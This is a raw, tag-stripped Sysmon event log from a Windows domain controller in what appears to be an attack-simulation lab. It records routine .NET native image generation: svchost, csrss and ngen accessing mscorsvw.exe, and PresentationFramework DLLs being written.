vc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.056{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-E803-00000000A301}4092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.040{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-E803-00000000A301}4092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.040{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-E803-00000000A301}4092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:21.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921D-6005-F503-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.868{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-921D-6005-F503-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:21.868{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921D-6005-F503-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:21.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921D-6005-F403-00000000A301}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.759{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921D-6005-F403-00000000A301}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:21.759{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921D-6005-F403-00000000A301}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:21.697{59A5CD1D-921D-6005-F303-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\be8-0\PresentationFramework.Classic.dll2021-01-18 13:50:21.697 10341000x80000000000000008197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:21.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921D-6005-F303-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.509{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921D-6005-F303-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:21.509{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921D-6005-F303-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:21.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921D-6005-F203-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.431{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921D-6005-F203-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:21.431{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921D-6005-F203-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:21.384{59A5CD1D-921D-6005-F103-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\dac-0\PresentationFramework.AeroLite.dll2021-01-18 13:50:21.384 10341000x80000000000000008190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:21.243{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921D-6005-F103-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.228{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921D-6005-F103-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:21.228{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921D-6005-F103-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:21.165{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921D-6005-F003-00000000A301}2512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.150{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-921D-6005-F003-00000000A301}2512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:21.150{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921D-6005-F003-00000000A301}2512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:21.087{59A5CD1D-921C-6005-EF03-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b08-0\PresentationFramework.Aero.dll2021-01-18 13:50:21.087 10341000x80000000000000008218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:22.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921E-6005-F903-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.759{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921E-6005-F903-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 